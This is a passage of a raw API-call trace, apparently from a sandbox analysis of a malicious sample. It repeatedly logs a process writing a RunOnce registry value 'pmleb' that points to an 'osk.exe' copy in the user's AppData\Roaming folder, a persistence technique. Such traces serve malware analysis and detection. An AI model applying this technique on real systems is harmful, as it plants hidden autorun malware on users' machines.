hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.043] RegCloseKey (hKey=0x280) returned 0x0 [0101.043] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.043] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.043] SetTimer (hWnd=0x20280, nIDEvent=0x237f, uElapse=0xa, lpTimerFunc=0x0) returned 0x237f [0101.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.047] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.047] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.047] KillTimer (hWnd=0x20280, uIDEvent=0x237f) returned 1 [0101.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.047] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.047] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.048] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.048] RegCloseKey (hKey=0x280) returned 0x0 [0101.048] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.048] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.048] SetTimer (hWnd=0x20280, nIDEvent=0x2380, uElapse=0xa, lpTimerFunc=0x0) returned 0x2380 [0101.048] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.063] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.063] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.063] KillTimer (hWnd=0x20280, uIDEvent=0x2380) returned 1 [0101.063] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.063] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.063] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.064] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.064] RegCloseKey (hKey=0x280) returned 0x0 [0101.064] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.064] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.064] SetTimer (hWnd=0x20280, nIDEvent=0x2381, uElapse=0xa, lpTimerFunc=0x0) returned 0x2381 [0101.064] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.078] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.078] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.078] KillTimer (hWnd=0x20280, uIDEvent=0x2381) returned 1 [0101.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.079] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.080] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.080] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.081] RegCloseKey (hKey=0x280) returned 0x0 [0101.081] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.081] SetTimer (hWnd=0x20280, nIDEvent=0x2382, uElapse=0xa, lpTimerFunc=0x0) returned 0x2382 [0101.081] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.094] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.094] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.094] KillTimer (hWnd=0x20280, uIDEvent=0x2382) returned 1 [0101.094] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.094] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.095] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.095] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.095] RegCloseKey (hKey=0x280) returned 0x0 [0101.095] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.095] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.095] SetTimer (hWnd=0x20280, nIDEvent=0x2383, uElapse=0xa, lpTimerFunc=0x0) returned 0x2383 [0101.095] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.109] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.109] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.109] KillTimer (hWnd=0x20280, 
uIDEvent=0x2383) returned 1 [0101.110] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.110] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.110] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.110] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.110] RegCloseKey (hKey=0x280) returned 0x0 [0101.111] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.111] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.111] SetTimer (hWnd=0x20280, nIDEvent=0x2384, uElapse=0xa, lpTimerFunc=0x0) returned 0x2384 [0101.111] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.125] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.125] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.125] KillTimer (hWnd=0x20280, uIDEvent=0x2384) returned 1 [0101.125] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.126] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.126] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.126] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.126] RegCloseKey (hKey=0x280) returned 0x0 [0101.126] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.126] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.126] SetTimer (hWnd=0x20280, nIDEvent=0x2385, uElapse=0xa, lpTimerFunc=0x0) returned 0x2385 [0101.126] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.140] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.140] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.141] KillTimer (hWnd=0x20280, uIDEvent=0x2385) returned 1 [0101.141] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.141] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.141] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.141] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.142] RegCloseKey (hKey=0x280) returned 0x0 [0101.142] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.142] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.142] SetTimer (hWnd=0x20280, nIDEvent=0x2386, uElapse=0xa, lpTimerFunc=0x0) returned 0x2386 [0101.142] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.156] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.156] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.156] KillTimer (hWnd=0x20280, uIDEvent=0x2386) returned 1 [0101.156] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0101.157] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.157] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.157] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.157] RegCloseKey (hKey=0x280) returned 0x0 [0101.157] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.157] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.158] SetTimer (hWnd=0x20280, nIDEvent=0x2387, uElapse=0xa, lpTimerFunc=0x0) returned 0x2387 [0101.158] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.172] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.172] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.172] KillTimer (hWnd=0x20280, uIDEvent=0x2387) returned 1 [0101.172] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.172] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.173] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.173] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.173] RegCloseKey (hKey=0x280) returned 0x0 
[0101.173] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.173] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.173] SetTimer (hWnd=0x20280, nIDEvent=0x2388, uElapse=0xa, lpTimerFunc=0x0) returned 0x2388 [0101.173] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.187] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.187] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.187] KillTimer (hWnd=0x20280, uIDEvent=0x2388) returned 1 [0101.188] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.188] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.188] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.188] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.188] RegCloseKey (hKey=0x280) returned 0x0 [0101.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.189] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.189] SetTimer (hWnd=0x20280, nIDEvent=0x2389, uElapse=0xa, lpTimerFunc=0x0) returned 0x2389 [0101.189] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.203] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.203] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.203] KillTimer (hWnd=0x20280, uIDEvent=0x2389) returned 1 [0101.203] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.203] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.204] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.204] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.204] RegCloseKey (hKey=0x280) returned 0x0 [0101.204] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.204] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.204] SetTimer (hWnd=0x20280, nIDEvent=0x238a, uElapse=0xa, lpTimerFunc=0x0) returned 0x238a [0101.204] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.219] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.219] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.219] KillTimer (hWnd=0x20280, uIDEvent=0x238a) returned 1 [0101.219] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.220] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.220] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.220] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.220] RegCloseKey (hKey=0x280) returned 0x0 [0101.220] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.220] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.220] SetTimer (hWnd=0x20280, nIDEvent=0x238b, uElapse=0xa, lpTimerFunc=0x0) returned 0x238b [0101.220] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.234] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.234] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.234] KillTimer (hWnd=0x20280, uIDEvent=0x238b) returned 1 [0101.234] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.235] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.235] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.235] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.235] RegCloseKey (hKey=0x280) returned 0x0 [0101.235] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.235] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.235] SetTimer (hWnd=0x20280, nIDEvent=0x238c, uElapse=0xa, lpTimerFunc=0x0) returned 0x238c [0101.236] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.300] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.300] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.300] KillTimer (hWnd=0x20280, uIDEvent=0x238c) returned 1 [0101.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.301] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.301] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.301] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.301] RegCloseKey (hKey=0x280) returned 0x0 [0101.302] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.302] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.302] SetTimer (hWnd=0x20280, nIDEvent=0x238d, uElapse=0xa, lpTimerFunc=0x0) returned 0x238d [0101.302] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.312] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.312] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.312] KillTimer (hWnd=0x20280, uIDEvent=0x238d) returned 1 [0101.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.313] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.313] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.313] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.314] RegCloseKey (hKey=0x280) returned 0x0 [0101.314] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.314] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0101.314] SetTimer (hWnd=0x20280, nIDEvent=0x238e, uElapse=0xa, lpTimerFunc=0x0) returned 0x238e [0101.314] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.328] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.328] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.328] KillTimer (hWnd=0x20280, uIDEvent=0x238e) returned 1 [0101.328] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.329] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.329] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.329] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.329] RegCloseKey (hKey=0x280) returned 0x0 [0101.329] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.329] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.330] SetTimer (hWnd=0x20280, nIDEvent=0x238f, uElapse=0xa, lpTimerFunc=0x0) returned 0x238f [0101.330] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.343] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.343] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.343] KillTimer (hWnd=0x20280, uIDEvent=0x238f) returned 1 [0101.344] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.344] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.344] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.344] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.344] RegCloseKey (hKey=0x280) returned 0x0 [0101.345] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.345] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.345] SetTimer (hWnd=0x20280, nIDEvent=0x2390, uElapse=0xa, lpTimerFunc=0x0) returned 0x2390 [0101.345] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0101.359] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0101.359] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0101.359] KillTimer (hWnd=0x20280, uIDEvent=0x2390) returned 1 [0101.359] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.360] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0101.360] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0101.360] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0101.360] RegCloseKey (hKey=0x280) returned 0x0 [0101.360] IUnknown:Release (This=0x7a9740) returned 0x1 [0101.360] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0101.360] SetTimer (hWnd=0x20280, nIDEvent=0x2391, uElapse=0xa, lpTimerFunc=0x0) returned 0x2391 
